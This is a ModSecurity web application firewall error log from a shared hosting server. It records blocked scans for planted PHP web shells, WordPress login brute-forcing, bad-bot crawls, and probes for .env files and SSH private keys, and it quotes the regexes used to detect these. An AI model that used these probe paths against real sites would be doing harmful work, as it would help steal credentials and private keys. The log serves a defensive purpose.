[Tue May 26 18:05:54.519290 2026] [security2:error] [pid 960743:tid 960935] [client 45.205.1.28:62959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahWTqvQvEln_BHBy2zJ77QAAAMM"]
[Tue May 26 18:05:54.730196 2026] [security2:error] [pid 960743:tid 960843] [remote 123.30.233.13:34746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahWTqvQvEln_BHBy2zJ77gAA1WM"]
[Tue May 26 18:05:55.362015 2026] [security2:error] [pid 960743:tid 960957] [client 185.192.70.83:56207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/css/css.php"] [unique_id "ahWTq_QvEln_BHBy2zJ8CwAAANk"]
[Tue May 26 18:05:55.450481 2026] [security2:error] [pid 960743:tid 960775] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWTq_QvEln_BHBy2zJ8DAABAx8"]
[Tue May 26 18:05:55.450775 2026] [security2:error] [pid 960743:tid 960999] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWTq_QvEln_BHBy2zJ8DAABAx8"]
[Tue May 26 18:05:56.075094 2026] [security2:error] [pid 960743:tid 960799] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ff.php"] [unique_id "ahWTrPQvEln_BHBy2zJ8HgAAkTc"]
[Tue May 26 18:05:56.075239 2026] [security2:error] [pid 960743:tid 960885] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ff.php"] [unique_id "ahWTrPQvEln_BHBy2zJ8HgAAkTc"]
[Tue May 26 18:05:56.312300 2026] [security2:error] [pid 960743:tid 960911] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTq_QvEln_BHBy2zJ8GwAAAKs"]
[Tue May 26 18:05:56.722455 2026] [security2:error] [pid 960743:tid 960774] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/x.php"] [unique_id "ahWTrPQvEln_BHBy2zJ8KgAAiR4"]
[Tue May 26 18:05:56.722721 2026] [security2:error] [pid 960743:tid 960877] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/x.php"] [unique_id "ahWTrPQvEln_BHBy2zJ8KgAAiR4"]
[Tue May 26 18:05:57.077239 2026] [security2:error] [pid 960743:tid 960791] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/tires.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8NwAA1S8"]
[Tue May 26 18:05:57.077470 2026] [security2:error] [pid 960743:tid 960953] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/tires.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8NwAA1S8"]
[Tue May 26 18:05:57.136279 2026] [security2:error] [pid 960743:tid 960894] [client 77.75.77.109:25346] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWTrfQvEln_BHBy2zJ8OAAAAJo"]
[Tue May 26 18:05:57.136438 2026] [security2:error] [pid 960743:tid 960894] [client 77.75.77.109:25346] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWTrfQvEln_BHBy2zJ8OAAAAJo"]
[Tue May 26 18:05:57.190032 2026] [security2:error] [pid 960743:tid 960901] [client 77.75.77.109:10754] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/party/"] [unique_id "ahWTrfQvEln_BHBy2zJ8PAAAAKE"]
[Tue May 26 18:05:57.190148 2026] [security2:error] [pid 960743:tid 960901] [client 77.75.77.109:10754] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/party/"] [unique_id "ahWTrfQvEln_BHBy2zJ8PAAAAKE"]
[Tue May 26 18:05:57.266051 2026] [security2:error] [pid 960743:tid 960786] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-block.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8PgAAjCo"]
[Tue May 26 18:05:57.266265 2026] [security2:error] [pid 960743:tid 960880] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-block.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8PgAAjCo"]
[Tue May 26 18:05:57.483601 2026] [security2:error] [pid 960743:tid 960789] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-der.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8QwAA8S0"]
[Tue May 26 18:05:57.483836 2026] [security2:error] [pid 960743:tid 960981] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-der.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8QwAA8S0"]
[Tue May 26 18:05:57.673126 2026] [security2:error] [pid 960743:tid 960780] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ah25.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8TQAA2SQ"]
[Tue May 26 18:05:57.673327 2026] [security2:error] [pid 960743:tid 960957] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ah25.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8TQAA2SQ"]
[Tue May 26 18:05:57.988884 2026] [security2:error] [pid 960743:tid 960933] [client 185.192.70.84:26623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/init.php"] [unique_id "ahWTrfQvEln_BHBy2zJ8VgAAAME"]
[Tue May 26 18:05:58.182782 2026] [security2:error] [pid 960743:tid 960792] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/inputs.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8WQAAkDA"]
[Tue May 26 18:05:58.182945 2026] [security2:error] [pid 960743:tid 960884] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/inputs.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8WQAAkDA"]
[Tue May 26 18:05:58.387149 2026] [security2:error] [pid 960743:tid 960797] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/samll.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8YQAArzU"]
[Tue May 26 18:05:58.387361 2026] [security2:error] [pid 960743:tid 960915] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/samll.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8YQAArzU"]
[Tue May 26 18:05:58.597757 2026] [security2:error] [pid 960743:tid 960807] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8aAAAtT8"]
[Tue May 26 18:05:58.597991 2026] [security2:error] [pid 960743:tid 960921] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8aAAAtT8"]
[Tue May 26 18:05:58.689254 2026] [security2:error] [pid 960743:tid 960983] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8XQAAAPM"]
[Tue May 26 18:05:58.801133 2026] [security2:error] [pid 960743:tid 960795] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/favicon.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8bgAArjM"]
[Tue May 26 18:05:58.801341 2026] [security2:error] [pid 960743:tid 960914] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/favicon.php"] [unique_id "ahWTrvQvEln_BHBy2zJ8bgAArjM"]
[Tue May 26 18:05:59.015764 2026] [security2:error] [pid 960743:tid 960778] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/aboutc.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8dAABASI"]
[Tue May 26 18:05:59.016015 2026] [security2:error] [pid 960743:tid 960997] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/aboutc.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8dAABASI"]
[Tue May 26 18:05:59.204384 2026] [security2:error] [pid 960743:tid 960783] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-load.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8eQAAlCc"]
[Tue May 26 18:05:59.204642 2026] [security2:error] [pid 960743:tid 960888] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-load.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8eQAAlCc"]
[Tue May 26 18:05:59.288094 2026] [core:crit] [pid 960743:tid 960954] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:05:59.424983 2026] [security2:error] [pid 960743:tid 960803] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/aevly.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8gwAAizs"]
[Tue May 26 18:05:59.425131 2026] [security2:error] [pid 960743:tid 960879] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/aevly.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8gwAAizs"]
[Tue May 26 18:05:59.648091 2026] [security2:error] [pid 960743:tid 960804] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/atkno.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8iAAA5Tw"]
[Tue May 26 18:05:59.648277 2026] [security2:error] [pid 960743:tid 960969] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/atkno.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8iAAA5Tw"]
[Tue May 26 18:05:59.837468 2026] [security2:error] [pid 960743:tid 960787] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/mini.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8jwAA4is"]
[Tue May 26 18:05:59.837615 2026] [security2:error] [pid 960743:tid 960966] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/mini.php"] [unique_id "ahWTr_QvEln_BHBy2zJ8jwAA4is"]
[Tue May 26 18:06:00.060066 2026] [security2:error] [pid 960743:tid 960809] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-thi.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8lgAA30E"]
[Tue May 26 18:06:00.060261 2026] [security2:error] [pid 960743:tid 960963] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-thi.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8lgAA30E"]
[Tue May 26 18:06:00.835225 2026] [security2:error] [pid 960743:tid 960781] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8rwAA1yU"]
[Tue May 26 18:06:00.835416 2026] [security2:error] [pid 960743:tid 960955] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8rwAA1yU"]
[Tue May 26 18:06:00.939879 2026] [security2:error] [pid 960743:tid 960978] [client 185.192.70.88:22965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/user/wp-login.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8owAAAO4"]
[Tue May 26 18:06:01.062997 2026] [security2:error] [pid 960743:tid 960907] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTsPQvEln_BHBy2zJ8oAAAAKc"]
[Tue May 26 18:06:01.070189 2026] [security2:error] [pid 960743:tid 960828] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/amax.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8twAAvVQ"]
[Tue May 26 18:06:01.070389 2026] [security2:error] [pid 960743:tid 960929] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/amax.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8twAAvVQ"]
[Tue May 26 18:06:01.274281 2026] [security2:error] [pid 960743:tid 960808] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wehrman.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8vQAAuUA"]
[Tue May 26 18:06:01.274428 2026] [security2:error] [pid 960743:tid 960925] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wehrman.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8vQAAuUA"]
[Tue May 26 18:06:01.472690 2026] [security2:error] [pid 960743:tid 960943] [client 5.255.120.167:49004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/app/.env"] [unique_id "ahWTsfQvEln_BHBy2zJ8ywAAAMs"]
[Tue May 26 18:06:01.473984 2026] [security2:error] [pid 960743:tid 960877] [client 5.255.120.167:49026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWTsfQvEln_BHBy2zJ8zAAAAIk"]
[Tue May 26 18:06:01.482497 2026] [security2:error] [pid 960743:tid 960794] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/b.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8zQAAlzI"]
[Tue May 26 18:06:01.482678 2026] [security2:error] [pid 960743:tid 960891] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/b.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8zQAAlzI"]
[Tue May 26 18:06:01.516188 2026] [security2:error] [pid 960743:tid 960947] [client 5.255.120.167:48916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env.old"] [unique_id "ahWTsfQvEln_BHBy2zJ80QAAAM8"]
[Tue May 26 18:06:01.822484 2026] [security2:error] [pid 960743:tid 960893] [client 5.255.120.167:49206] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.ssh/id_dsa"] [unique_id "ahWTsfQvEln_BHBy2zJ87QAAAJk"]
[Tue May 26 18:06:01.823061 2026] [security2:error] [pid 960743:tid 960962] [client 5.255.120.167:49190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env"] [unique_id "ahWTsfQvEln_BHBy2zJ87AAAAN4"]
